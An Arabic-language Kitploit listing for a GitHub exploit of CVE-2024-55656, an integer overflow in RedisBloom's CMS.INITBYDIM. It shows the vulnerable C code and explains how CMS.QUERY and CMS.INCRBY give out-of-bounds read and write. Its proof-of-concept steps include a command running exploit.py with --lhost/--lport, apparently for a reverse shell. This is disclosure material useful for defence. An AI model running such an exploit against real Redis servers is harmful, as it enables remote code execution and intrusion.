Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
redis-stack-CVE-2024-55656 | Kitploit
أدوات/GitHubGitHub/rick2600/redis-stack-cve-2024-55656
تحليل الذاكرة الجنائيتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن قواعد البياناتاستغلال الملفات الثنائية
GitHubrick2600/redis-stack-cve-2024-55656

redis-stack-CVE-2024-55656

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-55656 - Redis Stack - ثغرة تجاوز عدد صحيح في RedisBloom تسمح بتنفيذ تعليمات برمجية عن بُعد

  • العنوان: ثغرة Redis Stack في RedisBloom لتجاوز عدد صحيح تؤدي إلى تنفيذ تعليمات برمجية عن بُعد
  • ZDI: ZDI-25-009
  • CVE: CVE-2024-55656
  • الاعتمادات: rick2600 و gqsilva
  • CVSS: 8.8 (HIGH)
  • الإصدار المتأثر: RedisBloom v2.6.12 المرفق مع Redis Stack 7.2.0-v10

التحليل (نسخة مختصرة)

توجد ثغرة تجاوز عدد صحيح في RedisBloom (https://github.com/RedisBloom/RedisBloom)، وهي وحدة برمجية تُستخدم في redis (https://redis.io/docs/latest/develop/data-types/probabilistic/bloom-filter/). تتيح ثغرة تجاوز العدد الصحيح للمهاجم (وهو عميل redis يعرف كلمة المرور) تخصيص ذاكرة في الكومة (heap) أقل من الذاكرة المطلوبة بسبب التفاف القيمة (wraparound). وبعد ذلك يمكن إجراء قراءة وكتابة خارج هذه الذاكرة المخصصة، مما يؤدي إلى تسرب معلومات وكتابة خارج النطاق (OOB write).

تحدث ثغرة تجاوز العدد الصحيح في أمر CMS.INITBYDIM، الذي يهيئ بنية Count-Min Sketch بأبعاد يحددها المستخدم. يقبل هذا الأمر قيمتين (العرض width والعمق depth) ويستخدمهما لتخصيص الذاكرة داخل NewCMSketch()

الملف: src/cms.c

root@kitploit:~
CMSketch *NewCMSketch(size_t width, size_t depth) {
    assert(width > 0);
    assert(depth > 0);

    CMSketch *cms = CMS_CALLOC(1, sizeof(CMSketch));

    cms->width = width;
    cms->depth = depth;
    cms->counter = 0;
    cms->array = CMS_CALLOC(width * depth, sizeof(uint32_t));

    return cms;
}

يتم تحقيق القراءة خارج النطاق (OOB read) عبر أمر CMS.QUERY المُنفَّذ في الدالة CMS_Query().

يتم تحقيق الكتابة خارج النطاق (OOB write) عبر أمر CMS.INCRBY المُنفَّذ في الدالة CMS_IncrBy().

للاطلاع على التحليل الكامل، راجع النشرة الأمنية

إثبات المفهوم

  1. شغّل redis-stack

docker run -p 6379:6379 --name redis-stack redis/redis-stack:7.2.0-v10

  1. شغّل الاستغلال

python exploit.py --host 172.17.0.2 --port 6379 --lhost 172.17.0.1 --lport 4444

المراجع

  1. https://www.zerodayinitiative.com/advisories/ZDI-25-009/
  2. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h
  3. https://redis.io/blog/security-advisory-cve-2024-46981-cve-2024-51737-cve-2024-51480-cve-2024-55656/
تنزيل الأداة